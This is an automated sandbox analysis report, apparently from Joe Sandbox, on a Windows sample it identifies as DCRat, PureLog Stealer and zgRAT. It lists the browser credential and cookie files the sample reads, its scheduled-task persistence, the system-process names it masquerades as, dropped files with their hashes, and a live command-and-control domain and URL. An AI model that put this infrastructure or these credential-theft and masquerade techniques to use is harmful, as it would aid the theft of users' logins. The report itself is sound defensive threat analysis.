                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.4116310590.000000000346C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: U1jaLbTw1f.exe PID: 7584, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mGDcgYSpPaqkzVyIrStmzarQirIs.exe PID: 8052, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8128, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: U1jaLbTw1f.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.U1jaLbTw1f.exe.d80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1642273712.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: U1jaLbTw1f.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.U1jaLbTw1f.exe.d80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts11
                              Windows Management Instrumentation                              		1
                              Scheduled Task/Job                              		12
                              Process Injection                              		233
                              Masquerading                              		1
                              OS Credential Dumping                              		21
                              Security Software Discovery                              		Remote Services11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              Scripting                              		1
                              Scheduled Task/Job                              		1
                              Disable or Modify Tools                              		LSASS Memory2
                              Process Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		131
                              Virtualization/Sandbox Evasion                              		Security Account Manager131
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection                              		NTDS1
                              Application Window Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information                              		LSA Secrets2
                              File and Directory Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                              Obfuscated Files or Information                              		Cached Domain Credentials115
                              System Information Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                              Software Packing                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582948 Sample: U1jaLbTw1f.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 51 891781cm.renyash.ru 2->51 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Antivirus detection for URL or domain 2->59 61 17 other signatures 2->61 8 U1jaLbTw1f.exe 4 26 2->8         started        12 RuntimeBroker.exe 2->12         started        15 UserOOBEBroker.exe 2->15         started        17 8 other processes 2->17 signatures3 process4 dnsIp5 35 C:\Windows\SchCache\RuntimeBroker.exe, PE32 8->35 dropped 37 C:\Windows\...\UserOOBEBroker.exe, PE32 8->37 dropped 39 C:\Users\user\Desktop\wVAOlxRk.log, PE32 8->39 dropped 49 12 other malicious files 8->49 dropped 63 Uses schtasks.exe or at.exe to add and modify task schedules 8->63 65 Creates processes via WMI 8->65 67 Drops executable to a common third party application directory 8->67 19 cmd.exe 8->19         started        21 schtasks.exe 8->21         started        23 schtasks.exe 8->23         started        25 16 other processes 8->25 53 891781cm.renyash.ru 104.21.38.84, 49730, 49731, 49734 CLOUDFLARENETUS United States 12->53 41 C:\Users\user\Desktop\wJkgsuUR.log, PE32 12->41 dropped 43 C:\Users\user\Desktop\tbIFYUNW.log, PE32 12->43 dropped 45 C:\Users\user\Desktop\oGlGPwkc.log, PE32 12->45 dropped 47 C:\Users\user\Desktop\YEfCwsuO.log, PE32 12->47 dropped 69 Tries to harvest and steal browser information (history, passwords, etc) 12->69 71 Antivirus detection for dropped file 15->71 73 Multi AV Scanner detection for dropped file 15->73 75 Machine Learning detection for dropped file 15->75 file6 signatures7 process8 process9 27 conhost.exe 19->27         started        29 chcp.com 19->29         started        31 w32tm.exe 19->31         started        33 mGDcgYSpPaqkzVyIrStmzarQirIs.exe 19->33         started       

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              U1jaLbTw1f.exe56%VirustotalBrowse
                              U1jaLbTw1f.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              U1jaLbTw1f.exe100%AviraHEUR/AGEN.1323342
                              U1jaLbTw1f.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Windows\LiveKernelReports\UserOOBEBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\wVAOlxRk.log100%AviraTR/PSW.Agent.qngqt
                              C:\Users\user\Desktop\YEfCwsuO.log100%AviraTR/AVI.Agent.updqb
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\oGlGPwkc.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\mmgyBVMD.log100%AviraTR/AVI.Agent.updqb
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe100%AviraHEUR/AGEN.1323342
                              C:\Windows\LiveKernelReports\UserOOBEBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\wVAOlxRk.log100%Joe Sandbox ML
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\oGlGPwkc.log100%Joe Sandbox ML
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\wJkgsuUR.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\cDNiSsHV.log100%Joe Sandbox ML
                              C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Windows Security\RuntimeBroker.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\YEfCwsuO.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\bGmawssa.log25%ReversingLabs
                              C:\Users\user\Desktop\cDNiSsHV.log8%ReversingLabs
                              C:\Users\user\Desktop\mmgyBVMD.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\oGlGPwkc.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\tbIFYUNW.log25%ReversingLabs
                              C:\Users\user\Desktop\wJkgsuUR.log8%ReversingLabs
                              C:\Users\user\Desktop\wVAOlxRk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\LiveKernelReports\UserOOBEBroker.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\SchCache\RuntimeBroker.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php100%Avira URL Cloudmalware
                              http://891781cm.renyash.ru/100%Avira URL Cloudmalware
                              http://891781cm.renyash.ru100%Avira URL Cloudmalware
                              http://891781cm.reP0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              891781cm.renyash.ru
                              		104.21.38.84
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.phptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabfV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersGRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                          		high
                                          http://www.fontbureau.com/designers/?RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                		high
                                                http://www.fontbureau.com/designers?RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                    		high
                                                    http://www.tiro.comRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                        		high
                                                        http://www.fontbureau.com/designersRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://891781cm.rePRuntimeBroker.exe, 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.goodfont.co.krRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                              		high
                                                              http://www.carterandcone.comlRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sajatypeworks.comRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.typography.netDRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/cTheRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/staff/dennis.htmRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cnRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designers/frere-user.htmlRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://891781cm.renyash.ru/RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                                                  		high
                                                                                  http://www.jiyu-kobo.co.jp/RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.galapagosdesign.com/DPleaseRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.fontbureau.com/designers8RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fonts.comRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sandoll.co.krRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.urwpp.deDPleaseRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.zhongyicts.com.cnRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://891781cm.renyash.ruRuntimeBroker.exe, 00000016.00000002.4116310590.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003333000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003295000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameU1jaLbTw1f.exe, 00000000.00000002.1682090406.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sakkal.comRuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fV8fWeo1SO.22.dr, ATu8gpifmd.22.drfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.38.84
                                                                                                      		891781cm.renyash.ruUnited States
                                                                                                      		13335CLOUDFLARENETUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582948
                                                                                                      Start date and time:2025-01-01 04:21:06 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 54s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:39
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:U1jaLbTw1f.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:86af92730370230540800e6d509e4155.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@38/44@1/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 63.6%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 20.12.23.50, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target U1jaLbTw1f.exe, PID 2132 because it is empty
                                                                                                      • Execution Graph export aborted for target UserOOBEBroker.exe, PID 7512 because it is empty
                                                                                                      • Execution Graph export aborted for target mGDcgYSpPaqkzVyIrStmzarQirIs.exe, PID 5016 because it is empty
                                                                                                      • Execution Graph export aborted for target mGDcgYSpPaqkzVyIrStmzarQirIs.exe, PID 8052 because it is empty
                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      03:21:58Task SchedulerRun new task: mGDcgYSpPaqkzVyIrStmzarQirIs path: "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                                                                                                      03:21:58Task SchedulerRun new task: mGDcgYSpPaqkzVyIrStmzarQirIsm path: "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                                                                                                      03:21:58Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files\Windows Security\RuntimeBroker.exe"
                                                                                                      03:21:58Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files\Windows Security\RuntimeBroker.exe"
                                                                                                      03:21:58Task SchedulerRun new task: UserOOBEBrokerU path: "C:\Windows\LiveKernelReports\UserOOBEBroker.exe"
                                                                                                      03:22:00Task SchedulerRun new task: U1jaLbTw1f path: "C:\Users\user\Desktop\U1jaLbTw1f.exe"
                                                                                                      03:22:01Task SchedulerRun new task: U1jaLbTw1fU path: "C:\Users\user\Desktop\U1jaLbTw1f.exe"
                                                                                                      03:22:01Task SchedulerRun new task: UserOOBEBroker path: "C:\Windows\LiveKernelReports\UserOOBEBroker.exe"
                                                                                                      22:22:06API Interceptor13001359x Sleep call for process: RuntimeBroker.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.38.84ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                                                      67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                                                      gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSrename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                      • 162.159.128.233
                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.48.1
                                                                                                      https://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.25.14
                                                                                                      http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.16.1
                                                                                                      decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.16.1
                                                                                                      FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.75.126
                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.157.249
                                                                                                      ILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.175.217

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\user\Desktop\YEfCwsuO.logvoed9G7p5s.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          KzLetzDiM8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Program Files (x86)\jDownloader\config\62c36b511a00a4

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):147
                                                                                                                          Entropy (8bit):5.695102385894759
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ogMmigc9+M7xpcZ2pjRsWoWVjqJthBfoQzEAXWYGFP:D1DJZ2f3oSWJthBAQXWYGFP
                                                                                                                          MD5:563A3551A737FC5F6EBE225408FE06D2
                                                                                                                          SHA1:BA235CF81726E5219B5B93E71E00358BA5098B5A
                                                                                                                          SHA-256:5C1ED1503AF458022FEE783DD8E4AB32E007904EA8C30CD69610C35197A6E475
                                                                                                                          SHA-512:A3D14B089C534EDDD780B2972C26B281B6457DBA72CE3484B3D0D017D6C2CC4199E14B73D7B4BCFDB6F465D816A5D8DAD043A6363C649102D9184435AEDBC919
                                                                                                                          Malicious:false
                                                                                                                          Preview:1IHMBjlCS5U4mod5r7fVKt3RZECN3hCHA7qirNITqbL9OG6i6XKPug7HP0x6hYIu3M3p75OezLoti3DSIeQgXwWe9iT1aLwSSaFBMQkBJpai1NjVxexDImXGzZpYmWEnZWaIxBF23PWrWymv97E

                                                                                                                          C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1914880
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          MD5:86AF92730370230540800E6D509E4155
